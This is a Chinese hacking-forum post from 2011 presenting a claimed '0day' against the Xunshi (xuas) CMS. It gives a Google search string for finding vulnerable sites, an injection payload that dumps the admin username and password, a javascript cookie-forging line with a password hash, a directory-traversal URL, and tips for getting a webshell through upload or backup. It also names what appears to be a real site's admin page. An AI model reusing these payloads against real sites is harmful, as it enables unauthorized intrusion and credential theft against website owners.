服务器 > 网络安全 > 脚本攻防

讯时系统(xuas)最新通杀漏洞0day图文说明

42人参与 2011-07-15 脚本攻防

google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)

1、/admin/admin_news_pl_view.asp?id=1
//id任意 填入以下语句

2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!

3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='

爆出管理员帐号和密码了

4、cookies进后台

javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));

5、后台用了cookie验证,直接访问http://www.dxggw.cn/admin/admin_index.asp就ok了!

6、后台有上传和备份取shell不难。

7、讯时还有个列目录漏洞:http://www.xx.com/edit/admin_uploadfile.asp?id=46&dir=../..

逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞shell,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.xx.com/admin/admin_db_backup.asp?action=backupdata,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!

(0)
打赏 微信扫一扫 微信扫一扫

您想发表意见!!点此发布评论

推荐阅读

讯时漏洞一小结

07-15

php版shell.users加管理员帐号的方法

06-15

DedeCms V5.6漏洞 变量未初始化 导致鸡助漏洞

08-19

网站后台脚本漏洞挖掘技巧,基于工具快速挖掘

05-15

dedecms v5.6 GBK 注入漏洞利用(member/index.php)

08-19

Phpcms本地包含漏洞导致的写shell漏洞和删除任意文件漏洞

05-10

猜你喜欢

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论